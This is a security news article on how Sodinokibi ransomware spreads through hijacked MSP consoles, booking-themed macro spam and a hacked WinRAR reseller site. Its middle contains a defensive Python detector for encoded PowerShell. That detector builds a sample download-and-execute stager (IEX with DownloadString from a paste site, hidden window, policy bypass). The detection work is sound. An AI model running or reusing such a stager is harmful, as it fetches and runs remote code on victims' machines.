GandCrab Ransomware's operation is now shutting down, and malware developers are finding other ways to extort people via ransomware. A newcomer named Sodinokibi Ransomware has affiliates using a wide range of tactics to distribute it and earn money from victims.
They now have a new wave of attacks that involves hacking legitimate sites and replacing downloads with Sodinokibi-laced files, and hacking into Managed Service Providers (MSPs) to push the ransomware to all of their managed endpoints. Last but not least, they utilize spam campaigns for a wider reach.
Bottom line: once this gets run on your system, your files get encrypted and you find a ransom note asking you to pay before you get anything back.
There are three recent campaigns found in the wild that give the ransomware wider distribution and thus bring in more payments.
Primarily, they are targeting Managed Service Providers (MSPs).
Previous attacks by GandCrab affiliates have also targeted MSPs, and Sodinokibi ransomware has now been found circulating via MSPs as well. They reportedly did it by accessing the MSPs' networks via Remote Desktop Services and then using the MSPs' own management consoles to push ransomware installers to the endpoints they manage.
Kyle Hanslovan, the CEO of MSP security provider Huntress Labs, told BleepingComputer that one of the attacks against a large MSP appears to have been through their Webroot Management Console.
“On Wednesday, June 19th, we were notified by a large MSP they had a ransomware related incident. They believed this incident was initiated via their Webroot management console. This large MSP has not engaged with Huntress for forensic or incident response assistance.
This morning, one of the MSP's clients contacted BleepingComputer to share indicators to help the larger community. This client did not have Kaseya VSA in their network and only their Webroot hosts were encrypted. They exported the logs from their Webroot Management Console which confirmed PowerShell based payloads were tasked to run against 67 hosts. The PowerShell would download and execute an additional payload that was stored on Pastebin. We were not able to recover the Pastebin payload as it was already removed.”
The exported console logs show the PowerShell command being pushed to a large number of the managed endpoints.
Webroot already emailed customers to tell them that they have logged everyone out of their Webroot Management Consoles and enabled mandatory 2FA.
According to Hanslovan, a second attack appears to have used the MSP's Kaseya VSA console to push a file called 1488.bat to endpoints and execute it. Once executed, it would install the ransomware.
Security researchers have gotten hold of the 1488.bat file and are still analyzing it to find out more. It has been used to target a lot of MSPs, and some have been compromised.
BleepingComputer's security team was able to obtain the 1488.bat batch file and found that it contains a base64-encoded PowerShell command that decodes into a set of scripts. Once run, it downloads and executes a script that carries the base64-encoded Sodinokibi installer.
Besides the Kaseya and Webroot Management Consoles, ConnectWise Control is the third MSP management tool that was compromised and used to push ransomware. In one instance, ConnectWise Control was used to install the ransomware and successfully hit 200 hosts.
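The two console-driven attacks above (PowerShell payloads tasked from the Webroot console, and the 1488.bat file with its base64-encoded PowerShell command pushed through Kaseya VSA) share one detection opportunity: a management console's task export will contain the exact command line that was pushed. The script below is an added example, not code from the article or from any of the vendors named; it decodes `-EncodedCommand`-style base64 blobs (UTF-16LE, as PowerShell expects) from constructed log lines and flags download-and-execute patterns. The log format, host names, timestamps and the stager command are all constructed for the example and are not the real 1488.bat payload or a real console export.

```python
"""Flag encoded PowerShell tasks that download and execute from a remote host.

Added example: decodes base64 blobs passed to powershell.exe via -EncodedCommand
(and its common abbreviations) in console task logs and scores each task against
defender indicators. Log lines, host names and the stager URL are constructed.
"""
import base64
import re
from typing import Dict, List, Optional

# (regex, label) pairs a defender would look for in a pushed PowerShell command.
INDICATORS = [
    (re.compile(r"\bIEX\b|Invoke-Expression", re.I), "invoke-expression"),
    (re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I), "remote-download"),
    (re.compile(r"pastebin\.com", re.I), "paste-site-host"),
    (re.compile(r"FromBase64String", re.I), "nested-base64"),
    (re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I), "hidden-window"),
    (re.compile(r"-(?:ep|ex|exec|executionpolicy)\s+bypass", re.I), "execution-policy-bypass"),
]

# Matches "-e", "-ec", "-enc" or "-encodedcommand" followed by a base64 blob.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def encode_ps(command: str) -> str:
    """Encode a command the way -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")


def decode_ps(blob: str) -> Optional[str]:
    """Decode a base64 blob as UTF-16LE text; return None if it is not valid."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_line(line: str) -> Dict:
    """Return host, whether the command was encoded, the decoded text and matched labels."""
    host_m = re.search(r"host=(\S+)", line)
    host = host_m.group(1) if host_m else "?"
    enc_m = ENC_FLAG.search(line)
    decoded = decode_ps(enc_m.group(1)) if enc_m else None
    # Scan the decoded payload plus the outer command line with the blob removed,
    # so base64 characters cannot accidentally match a keyword.
    outer = line.replace(enc_m.group(1), "<base64>") if enc_m else line
    text = (decoded or "") + "\n" + outer
    hits = [label for rx, label in INDICATORS if rx.search(text)]
    return {"host": host, "encoded": decoded is not None, "decoded": decoded, "indicators": hits}


def suspicious_hosts(lines: List[str], min_hits: int = 2) -> List[str]:
    """Hosts whose tasked command matched at least min_hits indicators."""
    return [r["host"] for r in map(analyze_line, lines) if len(r["indicators"]) >= min_hits]


# Constructed stager and console export; the URL is a placeholder, not a real one.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/EXAMPLE')"
PUSHED = 'powershell -w hidden -ep bypass -enc ' + encode_ps(STAGER)
SAMPLE_LOG = [
    '2019-06-19T14:02:11Z task=RunScript host=WS-ACCT-01 cmd="' + PUSHED + '"',
    '2019-06-19T14:02:11Z task=RunScript host=WS-ACCT-02 cmd="' + PUSHED + '"',
    '2019-06-19T09:00:00Z task=RunScript host=SRV-FILE-01 cmd="powershell -enc '
    + encode_ps("Get-Service | Where-Object Status -eq Stopped") + '"',
    '2019-06-19T09:05:00Z task=RunScript host=SRV-DC-01 cmd="powershell Get-ChildItem C:\\Windows\\Temp"',
]

if __name__ == "__main__":
    for result in map(analyze_line, SAMPLE_LOG):
        print(result["host"], "encoded" if result["encoded"] else "plain", result["indicators"])
    print("suspicious:", suspicious_hosts(SAMPLE_LOG))
```

The threshold of two indicators keeps ordinary encoded admin scripts (the `Get-Service` task above decodes cleanly but matches nothing) out of the alert, while a hidden-window, policy-bypassing stager that pulls from a paste site trips five. In practice the same logic can be pointed at the console's real task export or at PowerShell script-block logging (Event ID 4104), where the decoded text is already available.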
Spam campaigns are also being used to distribute the ransomware, and a lure built around Booking.com is one good example. A new spam campaign discovered by security researcher TG Soft pretends to be a “New Booking” notification from Booking.com.
Users receive an email with a Word document attachment named along the lines of “Booking.com – 1571165841.doc”. Once you open the file, it asks you to “Enable Content” in order to access the booking information.
However, enabling the content runs embedded macros that download Sodinokibi from a remote site and execute it.
Another compromised website belonged to a WinRAR distributor in Italy (www.winrar.it). Targeting legitimate sites and replacing the installers they serve is a clever approach, and unfortunately, in this case, the attackers were able to do so.
The distributor has already been contacted about the ransomware file, and as of this writing their website has been taken down while they resolve the issue. WinRAR GmbH stated the following regarding the attack:
“The website which has been hacked is the website www.winrar.it/, which is run by our Italian distributor. It is not our website, but the one of our distributor, and it has been the victim of a hacker attack.”